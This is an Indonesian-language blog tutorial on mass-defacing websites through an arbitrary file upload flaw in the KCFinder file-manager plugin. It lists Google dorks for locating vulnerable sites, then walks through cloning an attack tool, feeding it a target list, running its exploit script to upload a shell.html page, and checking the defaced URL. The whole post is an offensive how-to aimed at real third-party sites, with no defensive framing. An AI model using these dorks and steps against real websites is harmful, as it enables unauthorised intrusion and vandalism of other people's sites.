» » Cara Deface POC KFCINDER Exploit

Cara Deface POC KFCINDER Exploit

Edit

 

KCFINDER adalah sebuah plugin pada cms wordpress yang berfungsi menambahkan fitur file manager dimana nantinya akan mengatur segala jenis proses transfer file pada situs. Beberapa cms lokal juga menerapkan kcfinder pada cms yang mereka gunakan. sayangnya plugin jenis ini memiliki beberapa kerentanan yang mengakibatkan adanya celah arbitary file upload pada website. Pada artikel ini nakanosec akan membahas bagaimana cara exploitasi celah Kcfinder dengan tools mass deface buatan nakanosec.

Bahan
  • Termux / Terminal
  • Internet
  • Browser
  • Script pepes html (belom bikin mass exploit yang php hehehehe)
  • Camilan (Kopi atau Boba enak juga)
Kumpulan Dork KCFINDER

  • inurl:semua-playlist.html intext:semua daftar / koleksi video
  • inurl:semua-agenda.html intitle:daftar semua agenda
  • inurl:/?scrindo= intext:Web Support System Bisnis Team
  • inurl:/admin/kcfinder/
  • inurl:/kcfinder/browse.php
  • inurl:/kcfinder/upload.php
  • inurl:/asset/kcfinder
  • sites/all/modules/civicrm/packages/kcfinder
  • inurl:templates/_editor/kcfinder/
  • inurl:includes/kcfinder/browse.php
  • inurl:/kcfinder/browse.php
  • inurl:lib/kcfinder/files/upload
  • inurl:admin/kcfinder/files/upload
  • inurl:panel/kcfinder/upload/files
  • inurl:editor/kcfinder/upload
  • inurl:Kcfinder/upload/files
  • inurl:/panel/kcfinder/ ext:png
Tutorial Deface Menggunakan Terminal atau Termux
1.Buat List web menggunakan dork diatas
2.Save as List.txt
3.Buka terminal dan lakukan installasi git dengan cara
sudo apt-get install git

Untuk user termux

pkg install git

4.Download toolsnya dengan command dibawah

 git clone https://github.com/Adelittle/kcexploit

5.Masuk ke Directory tools dengan perintah

cd kcexploit

6.Masukkan list.txt tadi kedalam Directory kcexploit atau bisa membuat file baru dengan perintah

nano list.txt

7.Pastekan list kalian dan tekan ctrl+x lalu ketik Y dan enter

8.Jalankan Tools tersebut dengan command dibawah

bash exploit.sh

 9.Masukkan nama list kalian (misal list.txt)

10.Tunggu sambil ngudud

Untuk hasilnya bisa kalian lihat di http://namaweb.com/kcfinder/upload/files/shell.html

Nantinya tools ini akan di update dimana hasil akan tersimpan otomatis pada file result.txt kalo adminya ga mager

untuk merubah nama file silahkan ubah shell.html pada codingan menjadi shell kalian dan letakkan pada directory kcexploit (cek warna merah)

Sekian tutorial deface dari nakanosec kalo ada pertanyaan bisa tanya lewat fanspage dan jangan lupa like fanspage kami dibawah ini :)


Nakanosec

Artikel Terbaru

Artikel Terbaru
Loading...